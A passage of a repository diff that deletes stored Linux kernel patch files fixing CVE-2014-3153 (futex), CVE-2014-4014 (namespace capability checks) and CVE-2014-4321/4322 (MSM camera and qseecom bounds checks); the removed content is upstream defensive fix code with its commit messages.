- [7] pi_state->owner can only be NULL when the OWNER_DIED bit is set.
-
- [8] Owner and user space value match
-
- [9] There is no transient state which sets the user space TID to 0
-     except exit_robust_list(), but this is indicated by the
-     FUTEX_OWNER_DIED bit. See [4]
-
-[10] There is no transient state which leaves owner and user space
-     TID out of sync.
-
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Will Drewry <wad@chromium.org>
-Cc: Darren Hart <dvhart@linux.intel.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- kernel/futex.c | 134 +++++++++++++++++++++++++++++++++++++++++++++------------
- 1 file changed, 106 insertions(+), 28 deletions(-)
-
-diff --git a/kernel/futex.c b/kernel/futex.c
-index e1cb1ba..de938d2 100644
---- a/kernel/futex.c
-+++ b/kernel/futex.c
-@@ -743,10 +743,58 @@ void exit_pi_state_list(struct task_struct *curr)
- 	raw_spin_unlock_irq(&curr->pi_lock);
- }
- 
-+/*
-+ * We need to check the following states:
-+ *
-+ *      Waiter | pi_state | pi->owner | uTID      | uODIED | ?
-+ *
-+ * [1]  NULL   | ---      | ---       | 0         | 0/1    | Valid
-+ * [2]  NULL   | ---      | ---       | >0        | 0/1    | Valid
-+ *
-+ * [3]  Found  | NULL     | --        | Any       | 0/1    | Invalid
-+ *
-+ * [4]  Found  | Found    | NULL      | 0         | 1      | Valid
-+ * [5]  Found  | Found    | NULL      | >0        | 1      | Invalid
-+ *
-+ * [6]  Found  | Found    | task      | 0         | 1      | Valid
-+ *
-+ * [7]  Found  | Found    | NULL      | Any       | 0      | Invalid
-+ *
-+ * [8]  Found  | Found    | task      | ==taskTID | 0/1    | Valid
-+ * [9]  Found  | Found    | task      | 0         | 0      | Invalid
-+ * [10] Found  | Found    | task      | !=taskTID | 0/1    | Invalid
-+ *
-+ * [1]	Indicates that the kernel can acquire the futex atomically. We
-+ *	came came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit.
-+ *
-+ * [2]	Valid, if TID does not belong to a kernel thread. If no matching
-+ *      thread is found then it indicates that the owner TID has died.
-+ *
-+ * [3]	Invalid. The waiter is queued on a non PI futex
-+ *
-+ * [4]	Valid state after exit_robust_list(), which sets the user space
-+ *	value to FUTEX_WAITERS | FUTEX_OWNER_DIED.
-+ *
-+ * [5]	The user space value got manipulated between exit_robust_list()
-+ *	and exit_pi_state_list()
-+ *
-+ * [6]	Valid state after exit_pi_state_list() which sets the new owner in
-+ *	the pi_state but cannot access the user space value.
-+ *
-+ * [7]	pi_state->owner can only be NULL when the OWNER_DIED bit is set.
-+ *
-+ * [8]	Owner and user space value match
-+ *
-+ * [9]	There is no transient state which sets the user space TID to 0
-+ *	except exit_robust_list(), but this is indicated by the
-+ *	FUTEX_OWNER_DIED bit. See [4]
-+ *
-+ * [10] There is no transient state which leaves owner and user space
-+ *	TID out of sync.
-+ */
- static int
- lookup_pi_state(u32 uval, struct futex_hash_bucket *hb,
--		union futex_key *key, struct futex_pi_state **ps,
--		struct task_struct *task)
-+		union futex_key *key, struct futex_pi_state **ps)
- {
- 	struct futex_pi_state *pi_state = NULL;
- 	struct futex_q *this, *next;
-@@ -756,12 +804,13 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb,
- 	plist_for_each_entry_safe(this, next, &hb->chain, list) {
- 		if (match_futex(&this->key, key)) {
- 			/*
--			 * Another waiter already exists - bump up
--			 * the refcount and return its pi_state:
-+			 * Sanity check the waiter before increasing
-+			 * the refcount and attaching to it.
- 			 */
- 			pi_state = this->pi_state;
- 			/*
--			 * Userspace might have messed up non-PI and PI futexes
-+			 * Userspace might have messed up non-PI and
-+			 * PI futexes [3]
- 			 */
- 			if (unlikely(!pi_state))
- 				return -EINVAL;
-@@ -769,44 +818,70 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb,
- 			WARN_ON(!atomic_read(&pi_state->refcount));
- 
- 			/*
--			 * When pi_state->owner is NULL then the owner died
--			 * and another waiter is on the fly. pi_state->owner
--			 * is fixed up by the task which acquires
--			 * pi_state->rt_mutex.
--			 *
--			 * We do not check for pid == 0 which can happen when
--			 * the owner died and robust_list_exit() cleared the
--			 * TID.
-+			 * Handle the owner died case:
- 			 */
--			if (pid && pi_state->owner) {
-+			if (uval & FUTEX_OWNER_DIED) {
- 				/*
--				 * Bail out if user space manipulated the
--				 * futex value.
-+				 * exit_pi_state_list sets owner to NULL and
-+				 * wakes the topmost waiter. The task which
-+				 * acquires the pi_state->rt_mutex will fixup
-+				 * owner.
- 				 */
--				if (pid != task_pid_vnr(pi_state->owner))
-+				if (!pi_state->owner) {
-+					/*
-+					 * No pi state owner, but the user
-+					 * space TID is not 0. Inconsistent
-+					 * state. [5]
-+					 */
-+					if (pid)
-+						return -EINVAL;
-+					/*
-+					 * Take a ref on the state and
-+					 * return. [4]
-+					 */
-+					goto out_state;
-+				}
-+
-+				/*
-+				 * If TID is 0, then either the dying owner
-+				 * has not yet executed exit_pi_state_list()
-+				 * or some waiter acquired the rtmutex in the
-+				 * pi state, but did not yet fixup the TID in
-+				 * user space.
-+				 *
-+				 * Take a ref on the state and return. [6]
-+				 */
-+				if (!pid)
-+					goto out_state;
-+			} else {
-+				/*
-+				 * If the owner died bit is not set,
-+				 * then the pi_state must have an
-+				 * owner. [7]
-+				 */
-+				if (!pi_state->owner)
- 					return -EINVAL;
- 			}
- 
- 			/*
--			 * Protect against a corrupted uval. If uval
--			 * is 0x80000000 then pid is 0 and the waiter
--			 * bit is set. So the deadlock check in the
--			 * calling code has failed and we did not fall
--			 * into the check above due to !pid.
-+			 * Bail out if user space manipulated the
-+			 * futex value. If pi state exists then the
-+			 * owner TID must be the same as the user
-+			 * space TID. [9/10]
- 			 */
--			if (task && pi_state->owner == task)
--				return -EDEADLK;
-+			if (pid != task_pid_vnr(pi_state->owner))
-+				return -EINVAL;
- 
-+		out_state:
- 			atomic_inc(&pi_state->refcount);
- 			*ps = pi_state;
--
- 			return 0;
- 		}
- 	}
- 
- 	/*
- 	 * We are the first waiter - try to look up the real owner and attach
--	 * the new pi_state to it, but bail out when TID = 0
-+	 * the new pi_state to it, but bail out when TID = 0 [1]
- 	 */
- 	if (!pid)
- 		return -ESRCH;
-@@ -839,6 +914,9 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb,
- 		return ret;
- 	}
- 
-+	/*
-+	 * No existing pi state. First waiter. [2]
-+	 */
- 	pi_state = alloc_pi_state();
- 
- 	/*
-@@ -959,7 +1037,7 @@ retry:
- 	 * We dont have the lock. Look up the PI state (or create it if
- 	 * we are the first waiter):
- 	 */
--	ret = lookup_pi_state(uval, hb, key, ps, task);
-+	ret = lookup_pi_state(uval, hb, key, ps);
- 
- 	if (unlikely(ret)) {
- 		switch (ret) {
-@@ -1565,7 +1643,7 @@ retry_private:
- 			 * rereading and handing potential crap to
- 			 * lookup_pi_state.
- 			 */
--			ret = lookup_pi_state(ret, hb2, &key2, &pi_state, NULL);
-+			ret = lookup_pi_state(ret, hb2, &key2, &pi_state);
- 		}
- 
- 		switch (ret) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch
deleted file mode 100644
index 05ac287f..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270 Mon Sep 17 00:00:00 2001
-From: Thomas Gleixner <tglx@linutronix.de>
-Date: Tue, 3 Jun 2014 12:27:06 +0000
-Subject: futex: Validate atomic acquisition in futex_lock_pi_atomic()
-
-We need to protect the atomic acquisition in the kernel against rogue
-user space which sets the user space futex to 0, so the kernel side
-acquisition succeeds while there is existing state in the kernel
-associated to the real owner.
-
-Verify whether the futex has waiters associated with kernel state.  If
-it has, return -EINVAL.  The state is corrupted already, so no point in
-cleaning it up.  Subsequent calls will fail as well.  Not our problem.
-
-[ tglx: Use futex_top_waiter() and explain why we do not need to try
-  	restoring the already corrupted user space state. ]
-
-Signed-off-by: Darren Hart <dvhart@linux.intel.com>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Will Drewry <wad@chromium.org>
-Cc: stable@vger.kernel.org
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- kernel/futex.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/kernel/futex.c b/kernel/futex.c
-index 663ea2b..520e7b2 100644
---- a/kernel/futex.c
-+++ b/kernel/futex.c
-@@ -910,10 +910,18 @@ retry:
- 		return -EDEADLK;
- 
- 	/*
--	 * Surprise - we got the lock. Just return to userspace:
-+	 * Surprise - we got the lock, but we do not trust user space at all.
- 	 */
--	if (unlikely(!curval))
--		return 1;
-+	if (unlikely(!curval)) {
-+		/*
-+		 * We verify whether there is kernel state for this
-+		 * futex. If not, we can safely assume, that the 0 ->
-+		 * TID transition is correct. If state exists, we do
-+		 * not bother to fixup the user space state as it was
-+		 * corrupted already.
-+		 */
-+		return futex_top_waiter(hb, key) ? -EINVAL : 1;
-+	}
- 
- 	uval = curval;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch
deleted file mode 100644
index 288e918c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From 23adbe12ef7d3d4195e80800ab36b37bee28cd03 Mon Sep 17 00:00:00 2001
-From: Andy Lutomirski <luto@amacapital.net>
-Date: Tue, 10 Jun 2014 12:45:42 -0700
-Subject: fs,userns: Change inode_capable to capable_wrt_inode_uidgid
-
-The kernel has no concept of capabilities with respect to inodes; inodes
-exist independently of namespaces.  For example, inode_capable(inode,
-CAP_LINUX_IMMUTABLE) would be nonsense.
-
-This patch changes inode_capable to check for uid and gid mappings and
-renames it to capable_wrt_inode_uidgid, which should make it more
-obvious what it does.
-
-Fixes CVE-2014-4014.
-
-Cc: Theodore Ts'o <tytso@mit.edu>
-Cc: Serge Hallyn <serge.hallyn@ubuntu.com>
-Cc: "Eric W. Biederman" <ebiederm@xmission.com>
-Cc: Dave Chinner <david@fromorbit.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Andy Lutomirski <luto@amacapital.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/attr.c                  |  8 ++++----
- fs/inode.c                 | 10 +++++++---
- fs/namei.c                 | 11 ++++++-----
- fs/xfs/xfs_ioctl.c         |  2 +-
- include/linux/capability.h |  2 +-
- kernel/capability.c        | 20 ++++++++------------
- 6 files changed, 27 insertions(+), 26 deletions(-)
-
-diff --git a/fs/attr.c b/fs/attr.c
-index 5d4e59d..6530ced 100644
---- a/fs/attr.c
-+++ b/fs/attr.c
-@@ -50,14 +50,14 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr)
- 	if ((ia_valid & ATTR_UID) &&
- 	    (!uid_eq(current_fsuid(), inode->i_uid) ||
- 	     !uid_eq(attr->ia_uid, inode->i_uid)) &&
--	    !inode_capable(inode, CAP_CHOWN))
-+	    !capable_wrt_inode_uidgid(inode, CAP_CHOWN))
- 		return -EPERM;
- 
- 	/* Make sure caller can chgrp. */
- 	if ((ia_valid & ATTR_GID) &&
- 	    (!uid_eq(current_fsuid(), inode->i_uid) ||
- 	    (!in_group_p(attr->ia_gid) && !gid_eq(attr->ia_gid, inode->i_gid))) &&
--	    !inode_capable(inode, CAP_CHOWN))
-+	    !capable_wrt_inode_uidgid(inode, CAP_CHOWN))
- 		return -EPERM;
- 
- 	/* Make sure a caller can chmod. */
-@@ -67,7 +67,7 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr)
- 		/* Also check the setgid bit! */
- 		if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
- 				inode->i_gid) &&
--		    !inode_capable(inode, CAP_FSETID))
-+		    !capable_wrt_inode_uidgid(inode, CAP_FSETID))
- 			attr->ia_mode &= ~S_ISGID;
- 	}
- 
-@@ -160,7 +160,7 @@ void setattr_copy(struct inode *inode, const struct iattr *attr)
- 		umode_t mode = attr->ia_mode;
- 
- 		if (!in_group_p(inode->i_gid) &&
--		    !inode_capable(inode, CAP_FSETID))
-+		    !capable_wrt_inode_uidgid(inode, CAP_FSETID))
- 			mode &= ~S_ISGID;
- 		inode->i_mode = mode;
- 	}
-diff --git a/fs/inode.c b/fs/inode.c
-index 2feb9b6..6eecb7f 100644
---- a/fs/inode.c
-+++ b/fs/inode.c
-@@ -1839,14 +1839,18 @@ EXPORT_SYMBOL(inode_init_owner);
-  * inode_owner_or_capable - check current task permissions to inode
-  * @inode: inode being checked
-  *
-- * Return true if current either has CAP_FOWNER to the inode, or
-- * owns the file.
-+ * Return true if current either has CAP_FOWNER in a namespace with the
-+ * inode owner uid mapped, or owns the file.
-  */
- bool inode_owner_or_capable(const struct inode *inode)
- {
-+	struct user_namespace *ns;
-+
- 	if (uid_eq(current_fsuid(), inode->i_uid))
- 		return true;
--	if (inode_capable(inode, CAP_FOWNER))
-+
-+	ns = current_user_ns();
-+	if (ns_capable(ns, CAP_FOWNER) && kuid_has_mapping(ns, inode->i_uid))
- 		return true;
- 	return false;
- }
-diff --git a/fs/namei.c b/fs/namei.c
-index 8016827..985c6f3 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -332,10 +332,11 @@ int generic_permission(struct inode *inode, int mask)
- 
- 	if (S_ISDIR(inode->i_mode)) {
- 		/* DACs are overridable for directories */
--		if (inode_capable(inode, CAP_DAC_OVERRIDE))
-+		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
- 			return 0;
- 		if (!(mask & MAY_WRITE))
--			if (inode_capable(inode, CAP_DAC_READ_SEARCH))
-+			if (capable_wrt_inode_uidgid(inode,
-+						     CAP_DAC_READ_SEARCH))
- 				return 0;
- 		return -EACCES;
- 	}
-@@ -345,7 +346,7 @@ int generic_permission(struct inode *inode, int mask)
- 	 * at least one exec bit set.
- 	 */
- 	if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))
--		if (inode_capable(inode, CAP_DAC_OVERRIDE))
-+		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
- 			return 0;
- 
- 	/*
-@@ -353,7 +354,7 @@ int generic_permission(struct inode *inode, int mask)
- 	 */
- 	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
- 	if (mask == MAY_READ)
--		if (inode_capable(inode, CAP_DAC_READ_SEARCH))
-+		if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))
- 			return 0;
- 
- 	return -EACCES;
-@@ -2379,7 +2380,7 @@ static inline int check_sticky(struct inode *dir, struct inode *inode)
- 		return 0;
- 	if (uid_eq(dir->i_uid, fsuid))
- 		return 0;
--	return !inode_capable(inode, CAP_FOWNER);
-+	return !capable_wrt_inode_uidgid(inode, CAP_FOWNER);
- }
- 
- /*
-diff --git a/fs/xfs/xfs_ioctl.c b/fs/xfs/xfs_ioctl.c
-index 0b18776..6152cbe 100644
---- a/fs/xfs/xfs_ioctl.c
-+++ b/fs/xfs/xfs_ioctl.c
-@@ -1215,7 +1215,7 @@ xfs_ioctl_setattr(
- 		 * cleared upon successful return from chown()
- 		 */
- 		if ((ip->i_d.di_mode & (S_ISUID|S_ISGID)) &&
--		    !inode_capable(VFS_I(ip), CAP_FSETID))
-+		    !capable_wrt_inode_uidgid(VFS_I(ip), CAP_FSETID))
- 			ip->i_d.di_mode &= ~(S_ISUID|S_ISGID);
- 
- 		/*
-diff --git a/include/linux/capability.h b/include/linux/capability.h
-index a6ee1f9..84b13ad 100644
---- a/include/linux/capability.h
-+++ b/include/linux/capability.h
-@@ -210,7 +210,7 @@ extern bool has_ns_capability_noaudit(struct task_struct *t,
- 				      struct user_namespace *ns, int cap);
- extern bool capable(int cap);
- extern bool ns_capable(struct user_namespace *ns, int cap);
--extern bool inode_capable(const struct inode *inode, int cap);
-+extern bool capable_wrt_inode_uidgid(const struct inode *inode, int cap);
- extern bool file_ns_capable(const struct file *file, struct user_namespace *ns, int cap);
- 
- /* audit system wants to get cap info from files as well */
-diff --git a/kernel/capability.c b/kernel/capability.c
-index 84b2bbf..a5cf13c 100644
---- a/kernel/capability.c
-+++ b/kernel/capability.c
-@@ -424,23 +424,19 @@ bool capable(int cap)
- EXPORT_SYMBOL(capable);
- 
- /**
-- * inode_capable - Check superior capability over inode
-+ * capable_wrt_inode_uidgid - Check nsown_capable and uid and gid mapped
-  * @inode: The inode in question
-  * @cap: The capability in question
-  *
-- * Return true if the current task has the given superior capability
-- * targeted at it's own user namespace and that the given inode is owned
-- * by the current user namespace or a child namespace.
-- *
-- * Currently we check to see if an inode is owned by the current
-- * user namespace by seeing if the inode's owner maps into the
-- * current user namespace.
-- *
-+ * Return true if the current task has the given capability targeted at
-+ * its own user namespace and that the given inode's uid and gid are
-+ * mapped into the current user namespace.
-  */
--bool inode_capable(const struct inode *inode, int cap)
-+bool capable_wrt_inode_uidgid(const struct inode *inode, int cap)
- {
- 	struct user_namespace *ns = current_user_ns();
- 
--	return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);
-+	return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid) &&
-+		kgid_has_mapping(ns, inode->i_gid);
- }
--EXPORT_SYMBOL(inode_capable);
-+EXPORT_SYMBOL(capable_wrt_inode_uidgid);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch
deleted file mode 100644
index 142053d4..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From 68c459daa22a26d6ca8f169baef6605ca8a285f2 Mon Sep 17 00:00:00 2001
-From: Alok Kediya <kediya@codeaurora.org>
-Date: Tue, 9 Dec 2014 12:53:29 +0530
-Subject: msm: camera: isp: Validate reg_offset and len parameters
-
-Validate reg_offset and len parameters before consuming to
-avoid invalid register access.
-
-Change-Id: I07676a6d10a9945fb0b99ebfd147075f896fbfab
-Signed-off-by: Alok Kediya <kediya@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c      | 36 +++++++++++++++++++---
- 1 file changed, 31 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 12fd081..620c01a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -495,13 +495,39 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	uint32_t *cfg_data, uint32_t cmd_len)
- {
- 	switch (reg_cfg_cmd->cmd_type) {
--	case VFE_WRITE: {
--		if (resource_size(vfe_dev->vfe_mem) <
--			(reg_cfg_cmd->u.rw_info.reg_offset +
--			reg_cfg_cmd->u.rw_info.len)) {
--			pr_err("%s: VFE_WRITE: Invalid length\n", __func__);
-+	case VFE_WRITE:
-+	case VFE_READ: {
-+		if ((reg_cfg_cmd->u.rw_info.reg_offset >
-+			(UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
-+			((reg_cfg_cmd->u.rw_info.reg_offset +
-+			reg_cfg_cmd->u.rw_info.len) >
-+			resource_size(vfe_dev->vfe_mem))) {
-+			pr_err("%s:%d reg_offset %d len %d res %d\n",
-+				__func__, __LINE__,
-+				reg_cfg_cmd->u.rw_info.reg_offset,
-+				reg_cfg_cmd->u.rw_info.len,
-+				(uint32_t)resource_size(vfe_dev->vfe_mem));
- 			return -EINVAL;
- 		}
-+
-+		if ((reg_cfg_cmd->u.rw_info.cmd_data_offset >
-+			(UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
-+			((reg_cfg_cmd->u.rw_info.cmd_data_offset +
-+			reg_cfg_cmd->u.rw_info.len) > cmd_len)) {
-+			pr_err("%s:%d cmd_data_offset %d len %d cmd_len %d\n",
-+				__func__, __LINE__,
-+				reg_cfg_cmd->u.rw_info.cmd_data_offset,
-+				reg_cfg_cmd->u.rw_info.len, cmd_len);
-+			return -EINVAL;
-+		}
-+		break;
-+	}
-+	default:
-+		break;
-+	}
-+
-+	switch (reg_cfg_cmd->cmd_type) {
-+	case VFE_WRITE: {
- 		msm_camera_io_memcpy(vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.rw_info.reg_offset,
- 			cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch
deleted file mode 100644
index 9fa7e42e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From b9470692c228608ef0ec60747ac2732ad7ffedf0 Mon Sep 17 00:00:00 2001
-From: Mona Hossain <mhossain@codeaurora.org>
-Date: Thu, 9 Oct 2014 12:00:03 -0700
-Subject: qseecom: Add boundary checks for offset within message.
-
-Qseecom driver does not have boundary checks for offset within the
-message. So this patch add checks to validate the offsets sent by
-client to modify data within the command request message and it
-should not exceed the memory allocated for that message.
-
-Change-Id: I29bfbdc154eebb4f3f4bfbb31789562e37fa5886
-Signed-off-by: Mona Hossain <mhossain@codeaurora.org>
-Signed-off-by: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
----
- drivers/misc/qseecom.c | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
- 1 file changed, 49 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 3a93469..b091acd 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1525,6 +1525,30 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
- 	return ret;
- }
- 
-+int boundary_checks_offset(struct qseecom_send_modfd_cmd_req *cmd_req,
-+			struct qseecom_send_modfd_listener_resp *lstnr_resp,
-+			struct qseecom_dev_handle *data, bool listener_svc,
-+			int i) {
-+	int ret = 0;
-+
-+	if ((!listener_svc) && (cmd_req->ifd_data[i].fd > 0)) {
-+		if (cmd_req->ifd_data[i].cmd_buf_offset >
-+				cmd_req->cmd_req_len - sizeof(uint32_t)) {
-+			pr_err("Invalid offset 0x%x\n",
-+					cmd_req->ifd_data[i].cmd_buf_offset);
-+			return ++ret;
-+		}
-+	} else if ((listener_svc) && (lstnr_resp->ifd_data[i].fd > 0)) {
-+		if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+				lstnr_resp->resp_len - sizeof(uint32_t)) {
-+			pr_err("Invalid offset 0x%x\n",
-+					lstnr_resp->ifd_data[i].cmd_buf_offset);
-+			return ++ret;
-+		}
-+	}
-+	return ret;
-+}
-+
- static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 					struct qseecom_dev_handle *data,
- 					bool listener_svc)
-@@ -1598,6 +1622,10 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 		if (sg_ptr->nents == 1) {
- 			uint32_t *update;
- 			update = (uint32_t *) field;
-+
-+			if (boundary_checks_offset(cmd_req, lstnr_resp, data,
-+							listener_svc, i))
-+				goto err;
- 			if (cleanup)
- 				*update = 0;
- 			else
-@@ -1607,6 +1635,27 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 		} else {
- 			struct qseecom_sg_entry *update;
- 			int j = 0;
-+
-+			if ((!listener_svc) && (cmd_req->ifd_data[i].fd > 0)) {
-+				if (cmd_req->ifd_data[i].cmd_buf_offset >
-+					cmd_req->cmd_req_len -
-+					sizeof(struct qseecom_sg_entry)) {
-+					pr_err("Invalid offset = 0x%x\n",
-+						cmd_req->ifd_data[i].
-+						cmd_buf_offset);
-+					goto err;
-+				}
-+			} else if ((listener_svc) &&
-+					(lstnr_resp->ifd_data[i].fd > 0)) {
-+				if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+							lstnr_resp->resp_len -
-+					sizeof(struct qseecom_sg_entry)) {
-+					pr_err("Invalid offset = 0x%x\n",
-+						lstnr_resp->ifd_data[i].
-+							cmd_buf_offset);
-+					goto err;
-+				}
-+			}
- 			update = (struct qseecom_sg_entry *) field;
- 			for (j = 0; j < sg_ptr->nents; j++) {
- 				if (cleanup) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch
deleted file mode 100644
index f6c32003..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch
+++ /dev/null
@@ -1,383 +0,0 @@
-From e909d95e6bded328e388d5b8d123297bbbb70728 Mon Sep 17 00:00:00 2001
-From: Mona Hossain <mhossain@codeaurora.org>
-Date: Mon, 3 Nov 2014 17:05:48 -0800
-Subject: qseecom:  Add checks for send_cmd inputs
-
-Improve user input validation across send cmd APIs. Add new
-API  __validate_send_cmd_inputs() to validate all user provided
-inputs.
-
-Change-Id: Ibbb0c0e7e5483f653bd59b927562b63c1e43c365
-Signed-off-by: Mona Hossain <mhossain@codeaurora.org>
----
- drivers/misc/qseecom.c | 221 ++++++++++++++++++++++++++++++-------------------
- 1 file changed, 134 insertions(+), 87 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 65001c5..244f1bf 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -981,7 +981,7 @@ static int qseecom_scale_bus_bandwidth(struct qseecom_dev_handle *data,
- 	}
- 	if (req_mode > HIGH) {
- 		pr_err("Invalid bandwidth mode (%d)\n", req_mode);
--		return ret;
-+		return -EINVAL;
- 	}
- 
- 	/*
-@@ -1834,24 +1834,16 @@ exit:
- 	return ret;
- }
- 
--static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
-+static int __validate_send_cmd_inputs(struct qseecom_dev_handle *data,
- 				struct qseecom_send_cmd_req *req)
--{
--	int ret = 0;
--	u32 reqd_len_sb_in = 0;
--	struct qseecom_client_send_data_ireq send_data_req;
--	struct qseecom_command_scm_resp resp;
--	unsigned long flags;
--	struct qseecom_registered_app_list *ptr_app;
--	bool found_app = false;
--	int name_len = 0;
- 
-+{
- 	if (!data || !data->client.ihandle) {
- 		pr_err("Client or client handle is not initialized\n");
- 		return -EINVAL;
- 	}
--
--	if (req->cmd_req_buf == NULL || req->resp_buf == NULL) {
-+	if (((req->resp_buf == NULL) && (req->resp_len != 0)) ||
-+						(req->cmd_req_buf == NULL)) {
- 		pr_err("cmd buffer or response buffer is null\n");
- 		return -EINVAL;
- 	}
-@@ -1862,8 +1854,6 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		pr_err("cmd buffer address not within shared bufffer\n");
- 		return -EINVAL;
- 	}
--
--
- 	if (((uintptr_t)req->resp_buf <
- 				data->client.user_virt_sb_base)  ||
- 		((uintptr_t)req->resp_buf >=
-@@ -1871,27 +1861,62 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		pr_err("response buffer address not within shared bufffer\n");
- 		return -EINVAL;
- 	}
--
--	if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
--		req->cmd_req_len > data->client.sb_length ||
--		req->resp_len > data->client.sb_length) {
--		pr_err("cmd buffer length or response buffer length not valid\n");
-+	if ((req->cmd_req_len == 0) ||
-+		(req->cmd_req_len > data->client.sb_length) ||
-+		(req->resp_len > data->client.sb_length)) {
-+		pr_err("cmd buf length or response buf length not valid\n");
- 		return -EINVAL;
- 	}
--
- 	if (req->cmd_req_len > UINT_MAX - req->resp_len) {
--		pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
-+		pr_err("Integer overflow detected in req_len & rsp_len\n");
- 		return -EINVAL;
- 	}
- 
--	reqd_len_sb_in = req->cmd_req_len + req->resp_len;
--	if (reqd_len_sb_in > data->client.sb_length) {
-+	if ((req->cmd_req_len + req->resp_len) > data->client.sb_length) {
- 		pr_debug("Not enough memory to fit cmd_buf.\n");
- 		pr_debug("resp_buf. Required: %u, Available: %zu\n",
--				reqd_len_sb_in, data->client.sb_length);
-+				(req->cmd_req_len + req->resp_len),
-+					data->client.sb_length);
- 		return -ENOMEM;
- 	}
-+	if ((uintptr_t)req->cmd_req_buf > (ULONG_MAX - req->cmd_req_len)) {
-+		pr_err("Integer overflow in req_len & cmd_req_buf\n");
-+		return -EINVAL;
-+	}
-+	if ((uintptr_t)req->resp_buf > (ULONG_MAX - req->resp_len)) {
-+		pr_err("Integer overflow in resp_len & resp_buf\n");
-+		return -EINVAL;
-+	}
-+	if (data->client.user_virt_sb_base >
-+					(ULONG_MAX - data->client.sb_length)) {
-+		pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+		return -EINVAL;
-+	}
-+	if ((((uintptr_t)req->cmd_req_buf + req->cmd_req_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+						data->client.sb_length)) ||
-+		(((uintptr_t)req->resp_buf + req->resp_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+						data->client.sb_length))) {
-+		pr_err("cmd buf or resp buf is out of shared buffer region\n");
-+		return -EINVAL;
-+	}
-+	return 0;
-+}
- 
